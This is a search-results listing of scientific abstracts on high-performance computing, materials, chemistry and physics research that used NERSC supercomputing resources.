  9. Large Scale GW Calculations on the Cori System

    NASA Astrophysics Data System (ADS)

    Deslippe, Jack; Del Ben, Mauro; da Jornada, Felipe; Canning, Andrew; Louie, Steven

    The NERSC Cori system, powered by 9000+ Intel Xeon-Phi processors, represents one of the largest HPC systems for open-science in the United States and the world. We discuss the optimization of the GW methodology for this system, including both node level and system-scale optimizations. We highlight multiple large scale (thousands of atoms) case studies and discuss both absolute application performance and comparison to calculations on more traditional HPC architectures. We find that the GW method is particularly well suited for many-core architectures due to the ability to exploit a large amount of parallelism across many layers of the system. This work was supported by the U.S. Department of Energy, Office of Science, Basic Energy Sciences, Materials Sciences and Engineering Division, as part of the Computational Materials Sciences Program.

  10. Graphics Processing Unit Acceleration of Gyrokinetic Turbulence Simulations

    NASA Astrophysics Data System (ADS)

    Hause, Benjamin; Parker, Scott

    2012-10-01

    We find a substantial increase in on-node performance using Graphics Processing Unit (GPU) acceleration in gyrokinetic delta-f particle-in-cell simulation. Optimization is performed on a two-dimensional slab gyrokinetic particle simulation using the Portland Group Fortran compiler with the GPU accelerator compiler directives. We have implemented the GPU acceleration on a Core I7 gaming PC with a NVIDIA GTX 580 GPU. We find comparable, or better, acceleration relative to the NERSC DIRAC cluster with the NVIDIA Tesla C2050 computing processor. The Tesla C 2050 is about 2.6 times more expensive than the GTX 580 gaming GPU. Optimization strategies and comparisons between DIRAC and the gaming PC will be presented. We will also discuss progress on optimizing the comprehensive three dimensional general geometry GEM code.

  11. Auger recombination in sodium iodide

    NASA Astrophysics Data System (ADS)

    McAllister, Andrew; Kioupakis, Emmanouil; Åberg, Daniel; Schleife, André

    2014-03-01

    Scintillators are an important tool used to detect high energy radiation - both in the interest of national security and in medicine. However, scintillator detectors currently suffer from lower energy resolutions than expected from basic counting statistics. This has been attributed to non-proportional light yield compared to incoming radiation, but the specific mechanism for this non-proportionality has not been identified. Auger recombination is a non-radiative process that could be contributing to the non-proportionality of scintillating materials. Auger recombination comes in two types - direct and phonon-assisted. We have used first-principles calculations to study Auger recombination in sodium iodide, a well characterized scintillating material. Our findings indicate that phonon-assisted Auger recombination is stronger in sodium iodide than direct Auger recombination. Computational resources provided by LLNL and NERSC. Funding provided by NA-22.

  12. Toward Rational Design of Cu/SSZ-13 Selective Catalytic Reduction Catalysts: Implications from Atomic-Level Understanding of Hydrothermal Stability

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Song, James; Wang, Yilin; Walter, Eric D.

    The hydrothermal stability of Cu/SSZ-13 SCR catalysts has been extensively studied, yet atomic level understanding of changes to the zeolite support and the Cu active sites during hydrothermal aging are still lacking. In this work, via the utilization of spectroscopic methods including solid-state 27Al and 29Si NMR, EPR, DRIFTS, and XPS, together with imaging and elemental mapping using STEM, detailed kinetic analyses, and theoretical calculations with DFT, various Cu species, including two types of isolated active sites and CuOx clusters, were precisely quantified for samples hydrothermally aged under varying conditions. This quantification convincingly confirms the exceptional hydrothermal stability of isolatedmore » Cu2+-2Z sites, and the gradual conversion of [Cu(OH)]+-Z to CuOx clusters with increasing aging severity. This stability difference is rationalized from the hydrolysis activation barrier difference between the two isolated sites via DFT. Discussions are provided on the nature of the CuOx clusters, and their possible detrimental roles on catalyst stability. Finally, a few rational design principles for Cu/SSZ-13 are derived rigorously from the atomic-level understanding of this catalyst obtained here. The authors gratefully acknowledge the US Department of Energy (DOE), Energy Efficiency and Renewable Energy, Vehicle Technologies Office for the support of this work. Computing time was granted by a user proposal at the William R. Wiley Environmental Molecular Sciences Laboratory (EMSL) and by the National Energy Research Scientific Computing Center (NERSC). The experimental studies described in this paper were performed in the EMSL, a national scientific user facility sponsored by the DOE’s Office of Biological and Environmental Research and located at Pacific Northwest National Laboratory (PNNL). PNNL is operated for the US DOE by Battelle.« less

  13. DEEP: Database of Energy Efficiency Performance

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Hong, Tianzhen; Piette, Mary; Lee, Sang Hoon

    A database of energy efficiency performance (DEEP) is a presimulated database to enable quick and accurate assessment of energy retrofit of commercial buildings. DEEP was compiled from results of about 10 million EnergyPlus simulations. DEEP provides energy savings for screening and evaluation of retrofit measures targeting the small and medium-sized office and retail buildings in California. The prototype building models are developed for a comprehensive assessment of building energy performance based on DOE commercial reference buildings and the California DEER [sic] prototype buildings. The prototype buildings represent seven building types across six vintages of constructions and 16 California climate zones.more » DEEP uses these prototypes to evaluate energy performance of about 100 energy conservation measures covering envelope, lighting, heating, ventilation, air conditioning, plug loads, and domestic hot war. DEEP consists the energy simulation results for individual retrofit measures as well as packages of measures to consider interactive effects between multiple measures. The large scale EnergyPlus simulations are being conducted on the super computers at the National Energy Research Scientific Computing Center (NERSC) of Lawrence Berkeley National Laboratory. The pre-simulation database is a part of the CEC PIER project to develop a web-based retrofit toolkit for small and medium-sized commercial buildings in California, which provides real-time energy retrofit feedback by querying DEEP with recommended measures, estimated energy savings and financial payback period based on users' decision criteria of maximizing energy savings, energy cost savings, carbon reduction, or payback of investment. The pre-simulated database and associated comprehensive measure analysis enhances the ability to performance assessments of retrofits to reduce energy use for small and medium buildings and business owners who typically do not have resources to conduct costly building energy audit.« less

  14. STAR Data Reconstruction at NERSC/Cori, an adaptable Docker container approach for HPC

    NASA Astrophysics Data System (ADS)

    Mustafa, Mustafa; Balewski, Jan; Lauret, Jérôme; Porter, Jefferson; Canon, Shane; Gerhardt, Lisa; Hajdu, Levente; Lukascsyk, Mark

    2017-10-01

    As HPC facilities grow their resources, adaptation of classic HEP/NP workflows becomes a need. Linux containers may very well offer a way to lower the bar to exploiting such resources and at the time, help collaboration to reach vast elastic resources on such facilities and address their massive current and future data processing challenges. In this proceeding, we showcase STAR data reconstruction workflow at Cori HPC system at NERSC. STAR software is packaged in a Docker image and runs at Cori in Shifter containers. We highlight two of the typical end-to-end optimization challenges for such pipelines: 1) data transfer rate which was carried over ESnet after optimizing end points and 2) scalable deployment of conditions database in an HPC environment. Our tests demonstrate equally efficient data processing workflows on Cori/HPC, comparable to standard Linux clusters.

  15. Aqueous Cation-Amide Binding: Free Energies and IR Spectral Signatures by Ab Initio Molecular Dynamics

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Pluharova, Eva; Baer, Marcel D.; Mundy, Christopher J.

    2014-07-03

    Understanding specific ion effects on proteins remains a considerable challenge. N-methylacetamide serves as a useful proxy for the protein backbone that can be well characterized both experimentally and theoretically. The spectroscopic signatures in the amide I band reflecting the strength of the interaction of alkali cations and alkali earth dications with the carbonyl group remain difficult to assign and controversial to interpret. Herein, we directly compute the IR shifts corresponding to the binding of either sodium or calcium to aqueous N-methylacetamide using ab initio molecular dynamics simulations. We show that the two cations interact with aqueous N-methylacetamide with different affinitiesmore » and in different geometries. Since sodium exhibits a weak interaction with the carbonyl group, the resulting amide I band is similar to an unperturbed carbonyl group undergoing aqueous solvation. In contrast, the stronger calcium binding results in a clear IR shift with respect to N-methylacetamide in pure water. Support from the Czech Ministry of Education (grant LH12001) is gratefully acknowledged. EP thanks the International Max-Planck Research School for support and the Alternative Sponsored Fellowship program at Pacific Northwest National Laboratory (PNNL). PJ acknowledges the Praemium Academie award from the Academy of Sciences. Calculations of the free energy profiles were made possible through generous allocation of computer time from the North-German Supercomputing Alliance (HLRN). Calculations of vibrational spectra were performed in part using the computational resources in the National Energy Research Supercomputing Center (NERSC) at Lawrence Berkeley National Laboratory. This work was supported by National Science Foundation grant CHE-0431312. CJM is supported by the U.S. Department of Energy`s (DOE) Office of Basic Energy Sciences, Division of Chemical Sciences, Geosciences and Biosciences. PNNL is operated for the Department of Energy by Battelle. MDB is grateful for the support of the Linus Pauling Distinguished Postdoctoral Fellowship Program at PNNL.« less

  16. Effect of polar surfaces on organic molecular crystals

    NASA Astrophysics Data System (ADS)

    Sharia, Onise; Tsyshevskiy, Roman; Kuklja, Maija; University of Maryland College Park Team

    Polar oxide materials reveal intriguing opportunities in the field of electronics, superconductivity and nanotechnology. While behavior of polar surfaces has been widely studied on oxide materials and oxide-oxide interfaces, manifestations and properties of polar surfaces in molecular crystals are still poorly understood. Here we discover that the polar catastrophe phenomenon, known on oxides, also takes place in molecular materials as illustrated with an example of cyclotetramethylene tetranitramine (HMX) crystals. We show that the surface charge separation is a feasible compensation mechanism to counterbalance the macroscopic dipole moment and remove the electrostatic instability. We discuss the role of surface charge on degradation of polar surfaces, electrical conductivity, optical band-gap closure and surface metallization. Research is supported by the US ONR (Grants N00014-16-1-2069 and N00014-16-1-2346) and NSF. We used NERSC, XSEDE and MARCC computational resources.

  17. Efficacy of Code Optimization on Cache-Based Processors

    NASA Technical Reports Server (NTRS)

    VanderWijngaart, Rob F.; Saphir, William C.; Chancellor, Marisa K. (Technical Monitor)

    1997-01-01

    In this paper a number of techniques for improving the cache performance of a representative piece of numerical software is presented. Target machines are popular processors from several vendors: MIPS R5000 (SGI Indy), MIPS R8000 (SGI PowerChallenge), MIPS R10000 (SGI Origin), DEC Alpha EV4 + EV5 (Cray T3D & T3E), IBM RS6000 (SP Wide-node), Intel PentiumPro (Ames' Whitney), Sun UltraSparc (NERSC's NOW). The optimizations all attempt to increase the locality of memory accesses. But they meet with rather varied and often counterintuitive success on the different computing platforms. We conclude that it may be genuinely impossible to obtain portable performance on the current generation of cache-based machines. At the least, it appears that the performance of modern commodity processors cannot be described with parameters defining the cache alone.

  18. GRDC. A Collaborative Framework for Radiological Background and Contextual Data Analysis

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Brian J. Quiter; Ramakrishnan, Lavanya; Mark S. Bandstra

    The Radiation Mobile Analysis Platform (RadMAP) is unique in its capability to collect both high quality radiological data from both gamma-ray detectors and fast neutron detectors and a broad array of contextual data that includes positioning and stance data, high-resolution 3D radiological data from weather sensors, LiDAR, and visual and hyperspectral cameras. The datasets obtained from RadMAP are both voluminous and complex and require analyses from highly diverse communities within both the national laboratory and academic communities. Maintaining a high level of transparency will enable analysis products to further enrich the RadMAP dataset. It is in this spirit of openmore » and collaborative data that the RadMAP team proposed to collect, calibrate, and make available online data from the RadMAP system. The Berkeley Data Cloud (BDC) is a cloud-based data management framework that enables web-based data browsing visualization, and connects curated datasets to custom workflows such that analysis products can be managed and disseminated while maintaining user access rights. BDC enables cloud-based analyses of large datasets in a manner that simulates real-time data collection, such that BDC can be used to test algorithm performance on real and source-injected datasets. Using the BDC framework, a subset of the RadMAP datasets have been disseminated via the Gamma Ray Data Cloud (GRDC) that is hosted through the National Energy Research Science Computing (NERSC) Center, enabling data access to over 40 users at 10 institutions.« less

  19. Many-Body Perturbation Theory for Understanding Optical Excitations in Organic Molecules and Solids

    NASA Astrophysics Data System (ADS)

    Sharifzadeh, Sahar

    Organic semiconductors are promising as light-weight, flexible, and strongly absorbing materials for next-generation optoelectronics. The advancement of such technologies relies on understanding the fundamental excited-state properties of organic molecules and solids, motivating the development of accurate computational approaches for this purpose. Here, I will present first-principles many-body perturbation theory (MBPT) calculations aimed at understanding the spectroscopic properties of select organic molecules and crystalline semiconductors, and improving these properties for enhanced photovoltaic performance. We show that for both gas-phase molecules and condensed-phase crystals, MBPT within the GW/BSE approximation provides quantitative accuracy of transport gaps extracted from photoemission spectroscopy and conductance measurements, as well as with measured polarization-dependent optical absorption spectra. We discuss the implications of standard approximations within GW/BSE on accuracy of these results. Additionally, we demonstrate significant exciton binding energies and charge-transfer character in the crystalline systems, which can be controlled through solid-state morphology or change of conjugation length, suggesting a new strategy for the design of optoelectronic materials. We acknowledge NSF for financial support; NERSC and Boston University for computational resources.

  20. Conformational Dynamics and Proton Relay Positioning in Nickel Catalysts for Hydrogen Production and Oxidation

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Franz, James A.; O'Hagan, Molly J.; Ho, Ming-Hsun

    2013-12-09

    The [Ni(PR2NR’2)2]2+ catalysts, (where PR2NR´2 is 1,5-R´-3,7-R-1,5-diaza-3,7-diphosphacyclooctane), are some of the fastest reported for hydrogen production and oxidation, however, chair/boat isomerization and the presence of a fifth solvent ligand have the potential to slow catalysis by incorrectly positioning the pendant amines or blocking the addition of hydrogen. Here, we report the structural dynamics of a series of [Ni(PR2NR’2)2]n+ complexes, characterized by NMR spectroscopy and theoretical modeling. A fast exchange process was observed for the [Ni(CH3CN)(PR2NR’2)2]2+ complexes which depends on the ligand. This exchange process was identified to occur through a three step mechanism including dissociation of the acetonitrile, boat/chair isomerizationmore » of each of the four rings identified by the phosphine ligands (including nitrogen inversion), and reassociation of acetonitrile on the opposite side of the complex. The rate of the chair/boat inversion can be influenced by varying the substituent on the nitrogen atom, but the rate of the overall exchange process is at least an order of magnitude faster than the catalytic rate in acetonitrile demonstrating that the structural dynamics of the [Ni(PR2NR´2)2]2+ complexes does not hinder catalysis. This material is based upon work supported as part of the Center for Molecular Electrocatalysis, an Energy Frontier Research Center funded by the US Department of Energy, Office of Science, Office of Basic Energy Sciences under FWP56073. Research by J.A.F., M.O., M-H. H., M.L.H, D.L.D. A.M.A., S. R. and R.M.B. was carried out in the Center for Molecular Electrocatalysis, an Energy Frontier Research Center funded by the U.S. Department of Energy, Office of Science. W.J.S. and S.L. were funded by the DOE Office of Science Early Career Research Program through the Office of Basic Energy Sciences. T.L. was supported by the US Department of Energy, Office of Basic Energy Sciences, Division of Chemical Sciences, Geosciences & Biosciences. Pacific Northwest National Laboratory (PNNL) is a multiprogram national laboratory operated for DOE by Battelle. Computational resources were provided at W. R. Wiley Environmental Molecular Science Laboratory (EMSL), a national scientific user facility sponsored by the Department of Energy’s Office of Biological and Environmental Research located at Pacific Northwest National Laboratory; the National Energy Research Scientific Computing Center (NERSC) at Lawrence Berkeley National Laboratory; and the Jaguar supercomputer at Oak Ridge National Laboratory (INCITE 2008-2011 award supported by the Office of Science of the U.S. DOE under Contract No. DE-AC0500OR22725).« less

  1. Ab initio simulations of subatomic resolution images in noncontact atomic force microscopy

    NASA Astrophysics Data System (ADS)

    Kim, Minjung; Chelikowsky, James R.

    2015-03-01

    Direct imaging of polycyclic aromatic molecules with a subatomic resolution has recently been achieved with noncontact atomic force microscopy (nc-AFM). Specifically, nc-AFM employing a CO functionalized tip has provided details of the chemical bond in aromatic molecules, including the discrimination of bond order. However, the underlying physics of such high resolution imaging remains problematic. By employing new, efficient algorithms based on real space pseudopotentials, we calculate the forces between the nc-AFM tip and specimen. We simulate images of planar organic molecules with two different approaches: 1) with a chemically inert tip and 2) with a CO functionalized tip. We find dramatic differences in the resulting images, which are consistent with recent experimental work. Our work is supported by the DOE under DOE/DE-FG02-06ER46286 and by the Welch Foundation under Grant F-1837. Computational resources were provided by NERSC and XSEDE.

  2. ESnet authentication services and trust federations

    NASA Astrophysics Data System (ADS)

    Muruganantham, Dhivakaran; Helm, Mike; Genovese, Tony

    2005-01-01

    ESnet provides authentication services and trust federation support for SciDAC projects, collaboratories, and other distributed computing applications. The ESnet ATF team operates the DOEGrids Certificate Authority, available to all DOE Office of Science programs, plus several custom CAs, including one for the National Fusion Collaboratory and one for NERSC. The secure hardware and software environment developed to support CAs is suitable for supporting additional custom authentication and authorization applications that your program might require. Seamless, secure interoperation across organizational and international boundaries is vital to collaborative science. We are fostering the development of international PKI federations by founding the TAGPMA, the American regional PMA, and the worldwide IGTF Policy Management Authority (PMA), as well as participating in European and Asian regional PMAs. We are investigating and prototyping distributed authentication technology that will allow us to support the "roaming scientist" (distributed wireless via eduroam), as well as more secure authentication methods (one-time password tokens).

  3. GOCE User Toolbox and Tutorial

    NASA Astrophysics Data System (ADS)

    Knudsen, P.; Benveniste, J.

    2011-07-01

    The GOCE User Toolbox GUT is a compilation of tools for the utilisation and analysis of GOCE Level 2 products. GUT support applications in Geodesy, Oceanography and Solid Earth Physics. The GUT Tutorial provides information and guidance in how to use the toolbox for a variety of applications. GUT consists of a series of advanced computer routines that carry out the required computations. It may be used on Windows PCs, UNIX/Linux Workstations, and Mac. The toolbox is supported by The GUT Algorithm Description and User Guide and The GUT Install Guide. A set of a-priori data and models are made available as well. GUT has been developed in a collaboration within the GUT Core Group. The GUT Core Group: S. Dinardo, D. Serpe, B.M. Lucas, R. Floberghagen, A. Horvath (ESA), O. Andersen, M. Herceg (DTU), M.-H. Rio, S. Mulet, G. Larnicol (CLS), J. Johannessen, L.Bertino (NERSC), H. Snaith, P. Challenor (NOC), K. Haines, D. Bretherton (NCEO), C. Hughes (POL), R.J. Bingham (NU), G. Balmino, S. Niemeijer, I. Price, L. Cornejo (S&T), M. Diament, I Panet (IPGP), C.C. Tscherning (KU), D. Stammer, F. Siegismund (UH), T. Gruber (TUM),

  4. Effective Hamiltonian approach to bright and dark excitons in single-walled carbon nanotubes

    NASA Astrophysics Data System (ADS)

    Choi, Sangkook; Deslippe, Jack; Louie, Steven G.

    2009-03-01

    Recently, excitons in single-walled carbon nanotubes (SWCNTs) have generated great research interest due to the large binding energies and unique screening properties associated with one-dimensional (1D) materials. Considerable progress in their theoretical understanding has been achieved by studies employing the ab initio GW-Bethe-Salpeter equation methodology. For example, the presence of bright and dark excitons with binding energies of a large fraction of an eV has been predicted and subsequently verified by experiment. Some of these results have also been quantitatively reproduced by recent model calculations using a spatially dependent screened Coulomb interaction between the excited electron and hole, an approach that would be useful for studying large diameter and chiral nanotubes with many atoms per unit cell. However, this previous model neglects the degeneracy of the band states and hence the dark excitons. We present an extension of this exciton model for the SWCNT, incorporating the screened Coulomb interaction as well as state degeneracy, to understand and compute the characteristics of the bright and dark excitons, such as the bright and dark level splittings. Supported by NSF #DMR07-05941, DOE #De-AC02-05CH11231 and computational resources from Teragrid and NERSC.

  5. Technology for national asset storage systems

    NASA Technical Reports Server (NTRS)

    Coyne, Robert A.; Hulen, Harry; Watson, Richard

    1993-01-01

    An industry-led collaborative project, called the National Storage Laboratory, was organized to investigate technology for storage systems that will be the future repositories for our national information assets. Industry participants are IBM Federal Systems Company, Ampex Recording Systems Corporation, General Atomics DISCOS Division, IBM ADSTAR, Maximum Strategy Corporation, Network Systems Corporation, and Zitel Corporation. Industry members of the collaborative project are funding their own participation. Lawrence Livermore National Laboratory through its National Energy Research Supercomputer Center (NERSC) will participate in the project as the operational site and the provider of applications. The expected result is an evaluation of a high performance storage architecture assembled from commercially available hardware and software, with some software enhancements to meet the project's goals. It is anticipated that the integrated testbed system will represent a significant advance in the technology for distributed storage systems capable of handling gigabyte class files at gigabit-per-second data rates. The National Storage Laboratory was officially launched on 27 May 1992.

  6. Impact of Weak Agostic Interactions in Nickel Electrocatalysts for Hydrogen Oxidation

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Klug, Christina M.; O’Hagan, Molly; Bullock, R. Morris

    To understand how H2 binding and oxidation is influenced by [Ni(PR2NR'2)2]2+ PR2NR'2 catalysts with H2 binding energies close to thermoneutral, two [Ni(PPh2NR'2)2]2+ (R = Me or C14H29) complexes with phenyl substituents on phosphorous and varying alkyl chain lengths on the pendant amine were studied. In the solid state, [Ni(PPh2NMe2)2]2+ exhibits an anagostic interaction between the Ni(II) center and the α-CH3 of the pendant amine, and DFT and variable-temperature 31P NMR experiments suggest than the anagostic interaction persists in solution. The equilibrium constants for H2 addition to these complexes was measured by 31P NMR spectroscopy, affording free energies of H2 additionmore » (ΔG°H2) of –0.8 kcal mol–1 in benzonitrile and –1.6 to –2.3 kcal mol–1 in THF. The anagostic interaction contributes to the low driving force for H2 binding by stabilizing the four-coordinate Ni(II) species prior to binding of H2. The pseudo-first order rate constants for H2 addition at 1 atm were measured by variable scan rate cyclic voltammetry, and were found to be similar for both complexes, less than 0.2 s–1 in benzonitrile and 3 –6 s–1 in THF. In the presence of exogenous base and H2 , turnover frequencies of electrocatalytic H2 oxidation were measured to be less than 0.2 s–1 in benzonitrile and 4 –9 s–1 in THF. These complexes are slower electrocatalysts for H2 oxidation than previously studied [Ni(PR2NR'2)2]2+ complexes due to a competition between H2 binding and formation of the anagostic interaction. However, the decrease in catalytic rate is accompanied by a beneficial 130 mV decrease in overpotential. This research was supported as part of the Center for Molecular Electrocatalysis, an Energy Frontier Research Center funded by the U.S. Department of Energy (DOE), Office of Science, Office of Basic Energy Sciences. Computational resources were provided at the National Energy Research Scientific Computing Center (NERSC) at Lawrence Berkeley National Laboratory. Mass spectrometry experiments were performed in the William R. Wiley Environmental Molecular Sciences Laboratory, a DOE national scientific user facility sponsored by the DOE’s Office of Biological and Environmental Research and located and the Pacific Northwest National Laboratory (PNNL). The authors thank Dr. Rosalie Chu for mass spectroscopy analysis. PNNL is operated by Battelle for DOE.« less

  7. DOE Centers of Excellence Performance Portability Meeting

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Neely, J. R.

    2016-04-21

    Performance portability is a phrase often used, but not well understood. The DOE is deploying systems at all of the major facilities across ASCR and ASC that are forcing application developers to confront head-on the challenges of running applications across these diverse systems. With GPU-based systems at the OLCF and LLNL, and Phi-based systems landing at NERSC, ACES (LANL/SNL), and the ALCF – the issue of performance portability is confronting the DOE mission like never before. A new best practice in the DOE is to include “Centers of Excellence” with each major procurement, with a goal of focusing efforts onmore » preparing key applications to be ready for the systems coming to each site, and engaging the vendors directly in a “shared fate” approach to ensuring success. While each COE is necessarily focused on a particular deployment, applications almost invariably must be able to run effectively across the entire DOE HPC ecosystem. This tension between optimizing performance for a particular platform, while still being able to run with acceptable performance wherever the resources are available, is the crux of the challenge we call “performance portability”. This meeting was an opportunity to bring application developers, software providers, and vendors together to discuss this challenge and begin to chart a path forward.« less

  8. ArrayBridge: Interweaving declarative array processing with high-performance computing

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Xing, Haoyuan; Floratos, Sofoklis; Blanas, Spyros

    Scientists are increasingly turning to datacenter-scale computers to produce and analyze massive arrays. Despite decades of database research that extols the virtues of declarative query processing, scientists still write, debug and parallelize imperative HPC kernels even for the most mundane queries. This impedance mismatch has been partly attributed to the cumbersome data loading process; in response, the database community has proposed in situ mechanisms to access data in scientific file formats. Scientists, however, desire more than a passive access method that reads arrays from files. This paper describes ArrayBridge, a bi-directional array view mechanism for scientific file formats, that aimsmore » to make declarative array manipulations interoperable with imperative file-centric analyses. Our prototype implementation of ArrayBridge uses HDF5 as the underlying array storage library and seamlessly integrates into the SciDB open-source array database system. In addition to fast querying over external array objects, ArrayBridge produces arrays in the HDF5 file format just as easily as it can read from it. ArrayBridge also supports time travel queries from imperative kernels through the unmodified HDF5 API, and automatically deduplicates between array versions for space efficiency. Our extensive performance evaluation in NERSC, a large-scale scientific computing facility, shows that ArrayBridge exhibits statistically indistinguishable performance and I/O scalability to the native SciDB storage engine.« less

  9. Excitonic Effects and Optical Absorption Spectrum of Doped Graphene

    NASA Astrophysics Data System (ADS)

    Jornada, Felipe; Deslippe, Jack; Louie, Steven

    2012-02-01

    First-principles calculations based on the GW-Bethe-Salpeter Equation (GW-BSE) approach and subsequent experiments have shown large excitonic effects in the optical absorbance of graphene. Here we employ the GW-BSE formalism to probe the effects of charge carrier doping and of having an external electric field on the absorption spectrum of graphene. We show that the absorbance peak due to the resonant exciton exhibits systematic changes in both its position and profile when graphene is gate doped by carriers, in excellent agreement to very recent measurementsootnotetextTony F. Heinz, private communications.. We analyze the various contributions to these changes in the absorption spectrum, such as the effects of screening by carriers to the quasiparticle energies and electron-hole interactions. This work was supported by National Science Foundation Grant No. DMR10-1006184, the U.S. Department of Energy under Contract No. DE-AC02-05CH11231, and the U.S. DOD - Office of Naval Research under RTC Grant No. N00014-09-1-1066. Computer time was provided by NERSC.

  10. Electronic and Optical Properties of Novel Phases of Silicon and Silicon-Based Derivatives

    NASA Astrophysics Data System (ADS)

    Ong, Chin Shen; Choi, Sangkook; Louie, Steven

    2014-03-01

    The vast majority of solar cells in the market today are made from crystalline silicon in the diamond-cubic phase. Nonetheless, diamond-cubic Si has an intrinsic disadvantage: it has an indirect band gap with a large energy difference between the direct gap and the indirect gap. In this work, we perform a careful study of the electronic and optical properties of a newly discovered cubic-Si20 phase of Si that is found to sport a direct band gap. In addition, other silicon-based derivatives have also been discovered and found to be thermodynamically metastable. We carry out ab initio GW and GW-BSE calculations for the quasiparticle excitations and optical spectra, respectively, of these new phases of silicon and silicon-based derivatives. This work was supported by NSF grant No. DMR10-1006184 and U.S. DOE under Contract No. DE-AC02-05CH11231. Computational resources have been provided by DOE at Lawrence Berkeley National Laboratory's NERSC facility and the NSF through XSEDE resources at NICS.

  11. Towards real-time detection and tracking of spatio-temporal features: Blob-filaments in fusion plasma

    DOE PAGES

    Wu, Lingfei; Wu, Kesheng; Sim, Alex; ...

    2016-06-01

    A novel algorithm and implementation of real-time identification and tracking of blob-filaments in fusion reactor data is presented. Similar spatio-temporal features are important in many other applications, for example, ignition kernels in combustion and tumor cells in a medical image. This work presents an approach for extracting these features by dividing the overall task into three steps: local identification of feature cells, grouping feature cells into extended feature, and tracking movement of feature through overlapping in space. Through our extensive work in parallelization, we demonstrate that this approach can effectively make use of a large number of compute nodes tomore » detect and track blob-filaments in real time in fusion plasma. Here, on a set of 30GB fusion simulation data, we observed linear speedup on 1024 processes and completed blob detection in less than three milliseconds using Edison, a Cray XC30 system at NERSC.« less

  12. High Performance Data Transfer for Distributed Data Intensive Sciences

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Fang, Chin; Cottrell, R 'Les' A.; Hanushevsky, Andrew B.

    We report on the development of ZX software providing high performance data transfer and encryption. The design scales in: computation power, network interfaces, and IOPS while carefully balancing the available resources. Two U.S. patent-pending algorithms help tackle data sets containing lots of small files and very large files, and provide insensitivity to network latency. It has a cluster-oriented architecture, using peer-to-peer technologies to ease deployment, operation, usage, and resource discovery. Its unique optimizations enable effective use of flash memory. Using a pair of existing data transfer nodes at SLAC and NERSC, we compared its performance to that of bbcp andmore » GridFTP and determined that they were comparable. With a proof of concept created using two four-node clusters with multiple distributed multi-core CPUs, network interfaces and flash memory, we achieved 155Gbps memory-to-memory over a 2x100Gbps link aggregated channel and 70Gbps file-to-file with encryption over a 5000 mile 100Gbps link.« less

  13. Connecting Restricted, High-Availability, or Low-Latency Resources to a Seamless Global Pool for CMS

    NASA Astrophysics Data System (ADS)

    Balcas, J.; Bockelman, B.; Hufnagel, D.; Hurtado Anampa, K.; Jayatilaka, B.; Khan, F.; Larson, K.; Letts, J.; Mascheroni, M.; Mohapatra, A.; Marra Da Silva, J.; Mason, D.; Perez-Calero Yzquierdo, A.; Piperov, S.; Tiradani, A.; Verguilov, V.; CMS Collaboration

    2017-10-01

    The connection of diverse and sometimes non-Grid enabled resource types to the CMS Global Pool, which is based on HTCondor and glideinWMS, has been a major goal of CMS. These resources range in type from a high-availability, low latency facility at CERN for urgent calibration studies, called the CAF, to a local user facility at the Fermilab LPC, allocation-based computing resources at NERSC and SDSC, opportunistic resources provided through the Open Science Grid, commercial clouds, and others, as well as access to opportunistic cycles on the CMS High Level Trigger farm. In addition, we have provided the capability to give priority to local users of beyond WLCG pledged resources at CMS sites. Many of the solutions employed to bring these diverse resource types into the Global Pool have common elements, while some are very specific to a particular project. This paper details some of the strategies and solutions used to access these resources through the Global Pool in a seamless manner.

  14. DESCQA: Synthetic Sky Catalog Validation Framework

    NASA Astrophysics Data System (ADS)

    Mao, Yao-Yuan; Uram, Thomas D.; Zhou, Rongpu; Kovacs, Eve; Ricker, Paul M.; Kalmbach, J. Bryce; Padilla, Nelson; Lanusse, François; Zu, Ying; Tenneti, Ananth; Vikraman, Vinu; DeRose, Joseph

    2018-04-01

    The DESCQA framework provides rigorous validation protocols for assessing the quality of high-quality simulated sky catalogs in a straightforward and comprehensive way. DESCQA enables the inspection, validation, and comparison of an inhomogeneous set of synthetic catalogs via the provision of a common interface within an automated framework. An interactive web interface is also available at portal.nersc.gov/project/lsst/descqa.

  15. Crosscut report: Exascale Requirements Reviews, March 9–10, 2017 – Tysons Corner, Virginia. An Office of Science review sponsored by: Advanced Scientific Computing Research, Basic Energy Sciences, Biological and Environmental Research, Fusion Energy Sciences, High Energy Physics, Nuclear Physics

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Gerber, Richard; Hack, James; Riley, Katherine

    The mission of the U.S. Department of Energy Office of Science (DOE SC) is the delivery of scientific discoveries and major scientific tools to transform our understanding of nature and to advance the energy, economic, and national security missions of the United States. To achieve these goals in today’s world requires investments in not only the traditional scientific endeavors of theory and experiment, but also in computational science and the facilities that support large-scale simulation and data analysis. The Advanced Scientific Computing Research (ASCR) program addresses these challenges in the Office of Science. ASCR’s mission is to discover, develop, andmore » deploy computational and networking capabilities to analyze, model, simulate, and predict complex phenomena important to DOE. ASCR supports research in computational science, three high-performance computing (HPC) facilities — the National Energy Research Scientific Computing Center (NERSC) at Lawrence Berkeley National Laboratory and Leadership Computing Facilities at Argonne (ALCF) and Oak Ridge (OLCF) National Laboratories — and the Energy Sciences Network (ESnet) at Berkeley Lab. ASCR is guided by science needs as it develops research programs, computers, and networks at the leading edge of technologies. As we approach the era of exascale computing, technology changes are creating challenges for science programs in SC for those who need to use high performance computing and data systems effectively. Numerous significant modifications to today’s tools and techniques will be needed to realize the full potential of emerging computing systems and other novel computing architectures. To assess these needs and challenges, ASCR held a series of Exascale Requirements Reviews in 2015–2017, one with each of the six SC program offices,1 and a subsequent Crosscut Review that sought to integrate the findings from each. Participants at the reviews were drawn from the communities of leading domain scientists, experts in computer science and applied mathematics, ASCR facility staff, and DOE program managers in ASCR and the respective program offices. The purpose of these reviews was to identify mission-critical scientific problems within the DOE Office of Science (including experimental facilities) and determine the requirements for the exascale ecosystem that would be needed to address those challenges. The exascale ecosystem includes exascale computing systems, high-end data capabilities, efficient software at scale, libraries, tools, and other capabilities. This effort will contribute to the development of a strategic roadmap for ASCR compute and data facility investments and will help the ASCR Facility Division establish partnerships with Office of Science stakeholders. It will also inform the Office of Science research needs and agenda. The results of the six reviews have been published in reports available on the web at http://exascaleage.org/. This report presents a summary of the individual reports and of common and 